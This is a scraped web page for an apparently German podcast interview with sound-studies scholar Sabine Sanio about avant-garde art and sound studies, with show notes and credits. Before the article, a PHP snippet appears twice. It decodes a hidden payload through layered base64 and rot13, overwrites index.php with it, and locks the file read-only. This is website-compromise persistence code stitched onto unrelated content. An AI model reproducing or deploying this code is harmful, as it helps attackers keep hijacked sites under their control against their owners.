$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Künstlerische Avantgardisten als Vorreiter der Sound Studies: Sabine Sanio – Auditive Medienkulturen

Künstlerische Avantgardisten als Vorreiter der Sound Studies: Sabine Sanio

Klangkunst- und Avantgarde-Expertin Sabine Sanio

Sabine Sanio studierte Germanistik und Romanistik und promovierte über das interdisziplinäre Thema “Alternativen zur Werkästhetik” bei dem Schriftsteller Helmut Heißenbüttel und dem Komponisten John Cage. Seit 2007 unterrichtet sie Sound Studies an der Universität der Künste (UdK) in Berlin. Im Gespräch mit Ania Mauruschat erklärt Sanio, wieso die künstlerischen Avantgardisten seit Erik Satie für sie Vorläufer und Wegbereiter der Cultural Studies und Sound Studies sind, und warum sie sehr vorsichtig damit ist, künstlerische Forschung zu defininieren. Sie ist jedoch davon überzeugt: Die künstlerischen Avantgardebewegungen und ihre künstlerische Erforschung nicht zu letzt des Alltags sind nach wie vor ein wichtiger Kern der Sound Studies, und das wird auch so bleiben, zumal wenn sich unser Verständnis vom genialen Künstler weiter ändert und heute jede:r ein:e Künstler:in sein kann. Ein Transkript des Gesprächs findet sich hier.

Shownotes

Portrait auf der Website des ZKM

Affiliation: Sound Studies and Sonic Arts, Universität der Künste Berlin

DFG-ForschungsprojektDas Hören des Anderen. Zur Ästhetik des Realen in experimenteller Musik und Klangkunst.


Credits

Interview: Ania Mauruschat
Schnitt: Leon Fiedler
Sounddesign: Matthias Roeckl & Rainer Schaller (rainer@slut-music.com)